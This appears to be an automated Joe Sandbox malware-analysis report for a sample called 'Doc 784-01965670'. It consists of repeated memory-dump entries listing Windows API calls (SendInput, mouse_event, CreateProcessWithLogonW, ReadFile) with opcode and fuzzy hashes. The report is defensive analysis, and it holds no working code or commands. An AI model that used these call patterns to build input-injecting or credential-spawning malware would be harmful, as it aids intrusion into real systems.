                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2221674350-0
                                                                                                                                    • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                    • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                                    • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                    • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$_wcscat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2037614760-0
                                                                                                                                    • Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                                                                    • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                                    • Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                                                                    • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                                    APIs
                                                                                                                                    • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                    • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4189319755-0
                                                                                                                                    • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                    • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                                    • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                    • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1726766782-0
                                                                                                                                    • Opcode ID: 16d5c57b5e53c2061fc4ac4ded6e87df9b6247511e9ffc13c2dfc8627616166f
                                                                                                                                    • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                                    • Opcode Fuzzy Hash: 16d5c57b5e53c2061fc4ac4ded6e87df9b6247511e9ffc13c2dfc8627616166f
                                                                                                                                    • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                                                    APIs
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
• EnableWindow.USER32(?,00000000), ref: 0044111A
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
• ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
• EnableWindow.USER32(?,00000001), ref: 004411B3
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
• Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
APIs
• SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
• SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
• InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
• GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
• Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
• Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
• Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
APIs
• GetForegroundWindow.USER32 ref: 00442597
  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
• GetDesktopWindow.USER32 ref: 004425BF
• GetWindowRect.USER32(00000000), ref: 004425C6
• mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
• GetCursorPos.USER32(?), ref: 00442624
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
• Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
• Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
• Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
APIs
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$Enable$Show$MessageSend
• String ID:
• API String ID: 1871949834-0
• Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
• Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
• Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
• Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
APIs
• _memset.LIBCMT ref: 0044961A
• SendMessageW.USER32 ref: 0044964A
  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
• SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
• _wcslen.LIBCMT ref: 004496BA
• _wcslen.LIBCMT ref: 004496C7
• SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$_wcslen$_memset_wcspbrk
• String ID:
• API String ID: 1624073603-0
• Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
• Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
• Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
• Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
• Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
• Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
• Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: DestroyWindow$DeleteObject$IconMove
• String ID:
• API String ID: 1640429340-0
• Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
• Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
• Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
• Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __fileno__setmode$DebugOutputString_fprintf
• String ID:
• API String ID: 3354276064-0
• Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
• Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
• Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
• Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
APIs
Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 752480666-0
                                                                                                                                    • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                    • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                                    • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                    • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3275902921-0
                                                                                                                                    • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                    • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                                    • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                    • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                                    • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                    • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                    • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                                    • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                    • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                                    APIs
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                                    • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                                    • __getptd.LIBCMT ref: 004141A8
                                                                                                                                    • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                                    • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1803633139-0
                                                                                                                                    • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                    • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                                    • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                    • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                                    APIs
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
